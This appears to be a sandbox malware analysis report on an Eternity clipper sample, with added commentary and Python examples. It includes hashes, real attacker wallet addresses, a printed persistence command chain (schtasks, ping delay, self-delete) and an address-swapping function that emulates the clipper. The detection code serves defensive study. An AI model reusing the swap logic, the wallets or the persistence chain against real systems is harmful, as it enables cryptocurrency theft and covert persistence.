Analysis
max time kernel: 113s
max time network: 145s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 17-11-2022 09:46
Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7-20221111-en
General
Target: file.exe
Size: 10.0MB
MD5: 71438bae518e4e312e1f6617ee0b268b
SHA1: 744f042e3b251786d7d15c960b93d7da83f75773
SHA256: 2e0407e923bff9826e61900e5c1addaf13e226564796527e83bc0384adb16ec8
SHA512: 6128bcdaf3006757b3a7f13f30bb07c91ade97214807e56f15df0fc20b4d45b44a0ba5cb73140aec9c6c5f4eb596219c9e5f897cccd07de6447780a6e677adaf
SSDEEP: 24576:LvtObzeG41/7E6E9h1hqmS10mSVBojjIY+SzsS:hOWVpX8V+48zsS
Malware Config
Extracted
family: eternity
URL (Tor hidden service): http://eternityms33k74r7iuuxfda4sqsiei3o3lbtr5cpalf6f4skszpruad.onion
wallet addresses (the 0x5296... address is listed five times in the extracted config; shown once here):
41r3LwMnez561bPJdamkzFfVoUJhmJQjHXSGz2e1Cb8xBCgvvSN36REatA7Ayn2GubDXyE2SQsar4LJDTAr8DnwPSmViy7o
1NSf3HSaEVJQv82Wg1Dxwrq8vksbXk1Uz9
0x5296E7a3aBa03B60e9ab2fF31Bc4Bda5C4306E70
D8JaQ1S56v9q1PYvgiMSiJKcpr62rzNmPP
TGPdhxdT1AdFBy9ojeACoPDhGG9BJsDRcG
t1V7NEnYmdnGVMFE7nLmW9r1DxnvBdZEcuu
XpTXPMSoGXwsHWs1h9fnUTDo2HfJbXyzqk
Signatures
-
Detects Eternity clipper 1 IoCs
Processes:
resource: behavioral2/memory/4976-136-0x0000000000400000-0x0000000000410000-memory.dmp
yara_rule: eternity_clipper
The match is in the 64KB region at 0x400000 of PID 4976, the child that PID 4624 wrote into and redirected with SetThreadContext, so the rule fires on the injected code rather than on the 10.0MB file on disk.
-
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
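How a clipper like the one flagged above turns the wallet list in the extracted config into clipboard swaps, as an added Python example. This is not code from the report, the sandbox or the Eternity kit: the address-format regexes are generic patterns (an assumption; the kit's real matching logic is not in the report), the coin labels are inferred from address format rather than stated in the config, and the sample clipboard text and victim addresses are constructed dummies.

```python
import re
from typing import Dict, List, Tuple

# Attacker wallets from the extracted config above. Coin labels are inferred
# from the address format; the report itself does not name them.
ETERNITY_WALLETS: Dict[str, str] = {
    "xmr":  "41r3LwMnez561bPJdamkzFfVoUJhmJQjHXSGz2e1Cb8xBCgvvSN36REatA7Ayn2GubDXyE2SQsar4LJDTAr8DnwPSmViy7o",
    "btc":  "1NSf3HSaEVJQv82Wg1Dxwrq8vksbXk1Uz9",
    "eth":  "0x5296E7a3aBa03B60e9ab2fF31Bc4Bda5C4306E70",
    "doge": "D8JaQ1S56v9q1PYvgiMSiJKcpr62rzNmPP",
    "trx":  "TGPdhxdT1AdFBy9ojeACoPDhGG9BJsDRcG",
    "zec":  "t1V7NEnYmdnGVMFE7nLmW9r1DxnvBdZEcuu",
    "dash": "XpTXPMSoGXwsHWs1h9fnUTDo2HfJbXyzqk",
}

# Generic address-format patterns (assumption: Eternity's own regexes are not in
# the report). The base58 alphabet excludes 0, O, I and l.
B58 = r"[1-9A-HJ-NP-Za-km-z]"
ADDRESS_PATTERNS: Dict[str, re.Pattern] = {
    "btc":  re.compile(rf"\b(?:bc1[02-9ac-hj-np-z]{{25,62}}|[13]{B58}{{25,34}})\b"),
    "eth":  re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
    "xmr":  re.compile(rf"\b[48]{B58}{{94}}\b"),
    "doge": re.compile(rf"\bD[5-9A-HJ-NP-U]{B58}{{32}}\b"),
    "trx":  re.compile(rf"\bT{B58}{{33}}\b"),
    "zec":  re.compile(rf"\bt1{B58}{{33}}\b"),
    "dash": re.compile(rf"\bX{B58}{{33}}\b"),
}

# Constructed clipboard contents for the demo; the victim addresses are dummies
# in valid format, not real wallets.
SAMPLE_CLIPBOARD = ("pay 0.5 BTC to 1TestVictimAddrXXXXXXXXXXXXXXXXXXX "
                    "or ETH 0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef")


def swap_addresses(clip_text: str, wallets: Dict[str, str] = ETERNITY_WALLETS
                   ) -> Tuple[str, List[Tuple[str, str, str]]]:
    """Emulate the clipper: every recognised wallet address in the clipboard
    text is replaced by the attacker's address for that coin. Returns the
    rewritten text and a list of (coin, original, replacement)."""
    hits: List[Tuple[str, str, str]] = []

    def make_sub(coin: str):
        def _sub(m: re.Match) -> str:
            original = m.group(0)
            if original == wallets[coin]:   # already the attacker's; nothing to do
                return original
            hits.append((coin, original, wallets[coin]))
            return wallets[coin]
        return _sub

    for coin, pattern in ADDRESS_PATTERNS.items():
        if coin in wallets:
            clip_text = pattern.sub(make_sub(coin), clip_text)
    return clip_text, hits


def is_attacker_address(addr: str, wallets: Dict[str, str] = ETERNITY_WALLETS) -> bool:
    """Hunting helper: does a pasted or transacted address belong to this config?"""
    return addr.strip() in set(wallets.values())


if __name__ == "__main__":
    rewritten, swaps = swap_addresses(SAMPLE_CLIPBOARD)
    print(rewritten)
    for coin, before, after in swaps:
        print(f"{coin}: {before} -> {after}")
```

The swap happens on the clipboard payload itself, which is why the report's AddClipboardFormatListener indicator matters: the listener is how the process learns that new text was copied. `is_attacker_address` is the hunt in the other direction, checking transaction or paste logs against the configured wallets.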
Executes dropped EXE 6 IoCs
Processes:
pid 4896 file.exe
pid 2448 file.exe
pid 4552 file.exe
pid 2268 file.exe
pid 4076 file.exe
pid 1948 file.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Key value queried: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation (process: file.exe)
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow 10: ip-api.com
-
Suspicious use of SetThreadContext 4 IoCs
Processes:
PID 4624 (file.exe) set thread context of PID 4976 (file.exe)
PID 4896 (file.exe) set thread context of PID 2448 (file.exe)
PID 4552 (file.exe) set thread context of PID 2268 (file.exe)
PID 4076 (file.exe) set thread context of PID 1948 (file.exe)
In every pair the source is the parent of the target and both run the same image; together with the eight WriteProcessMemory calls per pair listed below, this is the process-hollowing (RunPE) pattern: spawn a suspended copy of yourself, overwrite it, redirect its main thread.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid 2448 file.exe
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
Token: SeDebugPrivilege, pid 4624 file.exe
Token: SeDebugPrivilege, pid 4896 file.exe
Token: SeDebugPrivilege, pid 2448 file.exe
Token: SeDebugPrivilege, pid 4552 file.exe
Token: SeDebugPrivilege, pid 4076 file.exe
-
Suspicious use of WriteProcessMemory 47 IoCs
Processes (source PID -> target PID, number of writes):
PID 4624 (file.exe) wrote to memory of PID 4976 (file.exe): 8 writes
PID 4976 (file.exe) wrote to memory of PID 4676 (cmd.exe): 3 writes
PID 4676 (cmd.exe) wrote to memory of PID 4276 (chcp.com): 3 writes
PID 4676 (cmd.exe) wrote to memory of PID 4924 (PING.EXE): 3 writes
PID 4676 (cmd.exe) wrote to memory of PID 4716 (schtasks.exe): 3 writes
PID 4676 (cmd.exe) wrote to memory of PID 4896 (file.exe): 3 writes
PID 4896 (file.exe) wrote to memory of PID 2448 (file.exe): 8 writes
PID 4552 (file.exe) wrote to memory of PID 2268 (file.exe): 8 writes
PID 4076 (file.exe) wrote to memory of PID 1948 (file.exe): 8 writes
The three-write groups are the writes a parent makes into a child it is launching (cmd.exe spawning its helpers); the eight-write groups are exactly the four same-image parent/child pairs that also appear under SetThreadContext. The clipboard listener is registered by PID 2448, the hollowed child of the ServiceHub copy, not by the process on disk.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe (PID 4624)
command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\file.exe (PID 4976, child of 4624; the eternity_clipper YARA hit is in this process)
  command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe (PID 4676, child of 4976)
    command line: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "file" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\file.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\file.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\file.exe"
    - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\chcp.com (PID 4276)
      command line: chcp 65001
      C:\Windows\SysWOW64\PING.EXE (PID 4924)
      command line: ping 127.0.0.1
      - Runs ping.exe
      C:\Windows\SysWOW64\schtasks.exe (PID 4716)
      command line: schtasks /create /tn "file" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\file.exe" /rl HIGHEST /f
      - Creates scheduled task(s)
      C:\Users\Admin\AppData\Local\ServiceHub\file.exe (PID 4896)
      command line: "C:\Users\Admin\AppData\Local\ServiceHub\file.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\ServiceHub\file.exe (PID 2448, child of 4896)
        command line: "C:\Users\Admin\AppData\Local\ServiceHub\file.exe"
        - Executes dropped EXE
        - Suspicious behavior: AddClipboardFormatListener
        - Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exe (PID 4552, new process tree root)
command line: C:\Users\Admin\AppData\Local\ServiceHub\file.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\ServiceHub\file.exe (PID 2268, child of 4552)
  command line: "C:\Users\Admin\AppData\Local\ServiceHub\file.exe"
  - Executes dropped EXE
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exe (PID 4076, new process tree root)
command line: C:\Users\Admin\AppData\Local\ServiceHub\file.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\ServiceHub\file.exe (PID 1948, child of 4076)
  command line: "C:\Users\Admin\AppData\Local\ServiceHub\file.exe"
  - Executes dropped EXE
-
Reading the tree: the hollowed child at depth 2 runs one cmd.exe chain that switches the console to UTF-8 (chcp 65001), uses ping 127.0.0.1 as a short delay, registers a task named "file" that runs the ServiceHub copy every minute at the highest run level, deletes the original from Temp, and starts the copy. The two later roots run the ServiceHub path unquoted, exactly as the task's /tr argument is written, and each repeats the same same-image injection into a child. The process image is C:\Windows\SysWOW64\cmd.exe although the command line names System32, which is WOW64 file-system redirection for a 32-bit caller. PIDs are taken from the SetThreadContext and WriteProcessMemory tables; the two task-launched roots are listed in the order of their memory-dump sequence numbers.
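The parts of this tree worth turning into detection logic are the depth-3 command chain (schtasks every minute at highest run level pointing into AppData, ping as a sleep, self-delete, restart from the new path) and the same-image SetThreadContext pairs. The following added Python example is not from the report or the sandbox: it reconstructs the report's process tree as constructed event records (PIDs and command lines copied from the tree above, field names my own) and runs three checks over them; the path list in USER_WRITABLE and the rule thresholds are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Process creations reconstructed from the report's process tree; PIDs come from
# the SetThreadContext / WriteProcessMemory tables. Constructed input for the example.
PROCS: List[Dict] = [
    {"pid": 4624, "ppid": 0,    "image": r"C:\Users\Admin\AppData\Local\Temp\file.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\file.exe"'},
    {"pid": 4976, "ppid": 4624, "image": r"C:\Users\Admin\AppData\Local\Temp\file.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\file.exe"'},
    {"pid": 4676, "ppid": 4976, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": (r'"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && '
                 r'schtasks /create /tn "file" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\file.exe" /rl HIGHEST /f && '
                 r'DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\file.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\file.exe"')},
    {"pid": 4716, "ppid": 4676, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'schtasks /create /tn "file" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\file.exe" /rl HIGHEST /f'},
    {"pid": 4896, "ppid": 4676, "image": r"C:\Users\Admin\AppData\Local\ServiceHub\file.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\ServiceHub\file.exe"'},
    {"pid": 2448, "ppid": 4896, "image": r"C:\Users\Admin\AppData\Local\ServiceHub\file.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\ServiceHub\file.exe"'},
]
# (source pid, target pid) pairs from the SetThreadContext signature.
SET_THREAD_CONTEXT: List[Tuple[int, int]] = [(4624, 4976), (4896, 2448)]

# Locations a standard user can write to (assumption: tune for your estate).
USER_WRITABLE = re.compile(r"\\AppData\\(?:Local|Roaming)\\|\\Temp\\|\\ProgramData\\|\\Public\\", re.I)


def _tokens(cmdline: str) -> List[str]:
    """Split a Windows command line into tokens, honouring double quotes."""
    return [q or b for q, b in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def check_schtasks(cmdline: str) -> List[str]:
    """Flag schtasks /create invocations with the traits seen in this report."""
    toks = _tokens(cmdline)
    low = [t.lower() for t in toks]
    if "/create" not in low:
        return []
    opts: Dict[str, str] = {}
    for i, t in enumerate(low):                 # map each /switch to the token after it
        if t.startswith("/") and i + 1 < len(toks):
            opts[t] = toks[i + 1]
    findings: List[str] = []
    if opts.get("/sc", "").lower() == "minute":
        findings.append("task repeats every minute (/sc MINUTE)")
    if opts.get("/rl", "").lower() == "highest":
        findings.append("task requests highest run level (/rl HIGHEST)")
    action = opts.get("/tr", "")
    if USER_WRITABLE.search(action):
        findings.append(f"task action lives in a user-writable path: {action}")
    return findings


def check_self_delete(cmdline: str, parent_image: str) -> List[str]:
    """cmd.exe chain that sleeps via ping, deletes the parent's own binary and
    restarts it from a new path (the relocation step at depth 3 of the tree)."""
    low = cmdline.lower()
    findings: List[str] = []
    if re.search(r"\bping\s+(?:127\.0\.0\.1|localhost|-n\s+\d+)", low):
        findings.append("ping used as a delay before the next command")
    if re.search(r"\bdel\b", low) and parent_image.lower() in low:
        findings.append(f"deletes the parent's own image: {parent_image}")
    m = re.search(r'\bstart\s+""\s+"([^"]+)"', cmdline, re.I)
    if m and m.group(1).lower() != parent_image.lower():
        findings.append(f"restarts from a new location: {m.group(1)}")
    return findings


def hollowing_candidates(procs: List[Dict], ctx: List[Tuple[int, int]]) -> List[Tuple[int, int, str]]:
    """SetThreadContext from a parent into its own child running the same image:
    the hollowing pattern in the report's SetThreadContext signature."""
    by_pid = {p["pid"]: p for p in procs}
    hits: List[Tuple[int, int, str]] = []
    for src, dst in ctx:
        s, d = by_pid.get(src), by_pid.get(dst)
        if s and d and d["ppid"] == src and s["image"].lower() == d["image"].lower():
            hits.append((src, dst, d["image"]))
    return hits


def analyse(procs: List[Dict], ctx: List[Tuple[int, int]]) -> Dict[int, List[str]]:
    """Run all checks; returns {pid: [findings]} for processes that tripped one."""
    by_pid = {p["pid"]: p for p in procs}
    report: Dict[int, List[str]] = {}
    for p in procs:
        findings: List[str] = []
        name = p["image"].rsplit("\\", 1)[-1].lower()
        if "schtasks" in p["cmdline"].lower():      # direct call or wrapped in cmd /C
            findings += check_schtasks(p["cmdline"])
        if name == "cmd.exe" and p["ppid"] in by_pid:
            findings += check_self_delete(p["cmdline"], by_pid[p["ppid"]]["image"])
        if findings:
            report[p["pid"]] = findings
    for src, dst, image in hollowing_candidates(procs, ctx):
        report.setdefault(src, []).append(f"SetThreadContext into same-image child {dst} ({image})")
    return report


if __name__ == "__main__":
    for pid, findings in analyse(PROCS, SET_THREAD_CONTEXT).items():
        for f in findings:
            print(f"pid {pid}: {f}")
```

Each check is deliberately narrow. A minute-interval task alone is noisy, and a same-image child alone is what every browser does; the value is in the conjunction on one host within one tree, which is why `analyse` keys findings by PID so they can be joined back to the parent chain. The cmd.exe wrapper is checked for the schtasks traits as well as the schtasks.exe child, because telemetry that only logs the wrapper still sees the full chain.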
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
Filesize: 617B
MD5: 806dff23883c0aa6dcb04133b1380075
SHA1: ab9c711b18ac9edbd41966b3495f837746dbc146
SHA256: b58a668ac53e656011a581a7c1ce3d763b8120487f3017a5881298a588a34e17
SHA512: 42ff1897d652e4bf0467e402a9386501810db93d1e18824bb61ec231d50ae9dabed04043cd60996cd508fd3e495825bb02acb5d7619e20773f9bdc5c453017b6
This is the .NET Framework 4.x usage log the CLR writes for a 32-bit managed process; its name shows that a managed process called file.exe ran.
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exe (this entry appears seven times in the report, every time with the hashes below)
Filesize: 10.0MB
MD5: 71438bae518e4e312e1f6617ee0b268b
SHA1: 744f042e3b251786d7d15c960b93d7da83f75773
SHA256: 2e0407e923bff9826e61900e5c1addaf13e226564796527e83bc0384adb16ec8
SHA512: 6128bcdaf3006757b3a7f13f30bb07c91ade97214807e56f15df0fc20b4d45b44a0ba5cb73140aec9c6c5f4eb596219c9e5f897cccd07de6447780a6e677adaf
The hashes are identical to the submitted sample: the file in ServiceHub\ is a byte-for-byte copy of file.exe, so the sample relocates itself rather than dropping a distinct second stage. Hunting for the sample's hash therefore also covers the persisted copy.
-
-
memory/1948-155-0x0000000000000000-mapping.dmp
memory/1948-156-0x0000000000400000-0x0000000000410000-memory.dmp (Filesize: 64KB)
memory/2268-151-0x0000000000000000-mapping.dmp
memory/2448-145-0x0000000000000000-mapping.dmp
memory/2448-148-0x0000000007320000-0x00000000073B2000-memory.dmp (Filesize: 584KB)
memory/2448-149-0x00000000084C0000-0x00000000084CA000-memory.dmp (Filesize: 40KB)
memory/4276-139-0x0000000000000000-mapping.dmp
memory/4624-134-0x0000000005EE0000-0x0000000005F7C000-memory.dmp (Filesize: 624KB)
memory/4624-132-0x0000000000960000-0x0000000001360000-memory.dmp (Filesize: 10.0MB)
memory/4624-133-0x0000000006370000-0x0000000006914000-memory.dmp (Filesize: 5.6MB)
memory/4676-138-0x0000000000000000-mapping.dmp
memory/4716-141-0x0000000000000000-mapping.dmp
memory/4896-142-0x0000000000000000-mapping.dmp
memory/4924-140-0x0000000000000000-mapping.dmp
memory/4976-135-0x0000000000000000-mapping.dmp
memory/4976-136-0x0000000000400000-0x0000000000410000-memory.dmp (Filesize: 64KB)